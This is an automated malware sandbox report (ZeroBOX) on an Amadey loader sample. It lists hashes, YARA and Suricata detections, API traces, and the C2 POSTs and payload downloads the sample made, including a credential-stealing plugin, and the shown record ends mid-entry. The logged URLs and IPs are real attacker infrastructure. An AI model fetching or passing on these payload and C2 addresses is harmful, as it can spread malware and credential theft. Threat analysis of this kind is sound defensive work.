Summary | ZeroBOX

AAAd.exe

Emotet HermeticWiper Gen1 Browser Login Data Stealer Generic Malware UPX Downloader Antivirus Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) DGA HTTP Escalate priviledges PWS Http API Internet API Anti_VM Socket
Category FILE
Machine s1_win7_x6401
Started June 26, 2023, 7:42 a.m.
Completed June 26, 2023, 8:01 a.m.
Size 231.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3dd072d71907f6d5a5b046908c081f11
SHA256 1783a69593b72237fce4111d231ab3c919f9220e8baf8b2216c488d4dbedcdf1
CRC32 B56E2FEE
ssdeep 6144:0s9bFCavQJdMSzPgI0KIikB/NiFEZu7dRmV:pbFCRMcRIiTFgu7dR
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
104.17.187.189 Active Moloch
109.206.241.33 Active Moloch
121.254.136.27 Active Moloch
164.124.101.2 Active Moloch
172.67.205.237 Active Moloch
194.50.153.68 Active Moloch
195.123.226.82 Active Moloch
205.134.251.88 Active Moloch
79.137.192.3 Active Moloch
85.217.144.143 Active Moloch
85.217.144.228 Active Moloch
91.106.207.112 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49172 -> 109.206.241.33:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 109.206.241.33:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49174 -> 85.217.144.228:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 194.50.153.68:80 -> 192.168.56.101:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.50.153.68:80 -> 192.168.56.101:49178 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 85.217.144.143:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 85.217.144.143:80 -> 192.168.56.101:49188 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.101:49188 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49188 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 109.206.241.33:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49182 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 104.17.187.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49856 -> 172.67.205.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49381 -> 172.67.205.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49855 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49857 -> 172.67.205.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49862 -> 91.106.207.112:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 91.106.207.112:80 -> 192.168.56.101:49862 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 91.106.207.112:80 -> 192.168.56.101:49862 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49859 -> 109.206.241.33:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.101:49859 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49879 -> 85.217.144.143:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49879 -> 85.217.144.143:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2014819 ET INFO Packed Executable Download Misc activity
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 109.206.241.33:80 -> 192.168.56.101:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.206.241.33:80 -> 192.168.56.101:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49875 -> 79.137.192.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 79.137.192.3:80 -> 192.168.56.101:49875 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.137.192.3:80 -> 192.168.56.101:49875 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.137.192.3:80 -> 192.168.56.101:49875 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint

TLSv1 192.168.56.101:49185 -> 205.134.251.88:443
  issuer: C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority
  subject: CN=sungeomatics.com
  fingerprint: a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd

TLSv1 192.168.56.101:49182 -> 205.134.251.88:443
  issuer: C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority
  subject: CN=sungeomatics.com
  fingerprint: a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd

TLSv1 192.168.56.101:49193 -> 104.17.187.189:443
  issuer: C=US, O=DigiCert, Inc., CN=RapidSSL Global TLS RSA4096 SHA256 2022 CA1
  subject: CN=wdl1.pcfg.cache.wpscdn.com
  fingerprint: 31:de:33:8a:83:3d:ab:45:d7:5d:69:e1:ed:3d:4f:a8:e4:8b:12:34

TLSv1 192.168.56.101:49856 -> 172.67.205.237:443
  issuer: C=US, O=Let's Encrypt, CN=E1
  subject: CN=foryourbar.org
  fingerprint: d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18

TLSv1 192.168.56.101:49381 -> 172.67.205.237:443
  issuer: C=US, O=Let's Encrypt, CN=E1
  subject: CN=foryourbar.org
  fingerprint: d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18

TLSv1 192.168.56.101:49855 -> 205.134.251.88:443
  issuer: C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority
  subject: CN=sungeomatics.com
  fingerprint: a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd

TLSv1 192.168.56.101:49857 -> 172.67.205.237:443
  issuer: C=US, O=Let's Encrypt, CN=E1
  subject: CN=foryourbar.org
  fingerprint: d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "jbruyer.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000239390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd7a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd7a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd7a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ada70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ada70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ada70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ae950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ae950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000201f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000201f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000202a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000202a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000202a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
Save+0x8d973 Main-0x1478d cred64+0x91e43 @ 0x7feef391e43
Save+0x8f58b Main-0x12b75 cred64+0x93a5b @ 0x7feef393a5b
Save+0x90613 Main-0x11aed cred64+0x94ae3 @ 0x7feef394ae3
Save+0x909bf Main-0x11741 cred64+0x94e8f @ 0x7feef394e8f
Save+0xa1ae8 Main-0x618 cred64+0xa5fb8 @ 0x7feef3a5fb8
Main+0x65 cred64+0xa6635 @ 0x7feef3a6635
rundll32+0x2f42 @ 0xffb92f42
rundll32+0x3b7a @ 0xffb93b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d973 Main-0x1478d cred64+0x91e43
exception.address: 0x7feef391e43
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 24
registers.rbx: 0
registers.rsp: 2424800
registers.r11: 2419696
registers.r8: 0
registers.r9: 249120620554
registers.rdx: 3453616
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895
stacktrace+0x84 memdup-0x1af @ 0x73980470
hook_in_monitor+0x45 lde-0x133 @ 0x739742ea
New_ntdll_RtlAddVectoredExceptionHandler+0x20 New_ntdll_RtlCompressBuffer-0xed @ 0x73996340
0x920ee
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x76d80895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1437720
registers.rsi: 20
registers.r10: 0
registers.rbx: 1
registers.rsp: 1439744
registers.r11: 596580
registers.r8: 64
registers.r9: 4287995904
registers.rdx: 1439064
registers.r12: 599640
registers.rbp: 4287995904
registers.rdi: 4287696912
registers.rax: 1437400
registers.r13: 591256
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://109.206.241.33/9bDc8sQ/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://109.206.241.33/9bDc8sQ/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.228/files/AAAd1.exe
suspicious_features GET method with no useragent header suspicious_request GET http://galandskiyher2.com/downloads/toolspub1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.143/files/setup.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.206.241.33/9bDc8sQ/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.206.241.33/9bDc8sQ/Plugins/clip64.dll
suspicious_features GET method with no useragent header suspicious_request GET http://gejevesd.beget.tech/385118/setup.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.137.192.3/staticlittlesource.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.143/files/My2.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/postmon.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/dd_64.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc4.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc5.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc1.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.php
suspicious_features GET method with no useragent header suspicious_request GET https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/download/11.2.0.11537/300.910/WPSOffice_11.2.0.11537.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/debug2.ps1
request POST http://109.206.241.33/9bDc8sQ/index.php
request POST http://109.206.241.33/9bDc8sQ/index.php?scr=1
request GET http://85.217.144.228/files/AAAd1.exe
request GET http://galandskiyher2.com/downloads/toolspub1.exe
request GET http://85.217.144.143/files/setup.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://109.206.241.33/9bDc8sQ/Plugins/cred64.dll
request GET http://109.206.241.33/9bDc8sQ/Plugins/clip64.dll
request GET http://gejevesd.beget.tech/385118/setup.exe
request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
request GET http://79.137.192.3/staticlittlesource.exe
request GET http://85.217.144.143/files/My2.exe
request GET https://sungeomatics.com/css/colors/postmon.exe
request GET https://sungeomatics.com/css/colors/dd_64.exe
request GET https://sungeomatics.com/css/colors/cc2.exe
request GET https://sungeomatics.com/css/colors/cc3.exe
request GET https://sungeomatics.com/css/colors/cc4.exe
request GET https://sungeomatics.com/css/colors/cc5.exe
request GET https://sungeomatics.com/css/colors/cc1.php
request GET https://sungeomatics.com/css/colors/cc2.php
request GET https://sungeomatics.com/css/colors/cc3.php
request GET https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/download/11.2.0.11537/300.910/WPSOffice_11.2.0.11537.exe
request GET https://sungeomatics.com/css/colors/debug2.ps1
request POST http://109.206.241.33/9bDc8sQ/index.php
request POST http://109.206.241.33/9bDc8sQ/index.php?scr=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000048f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

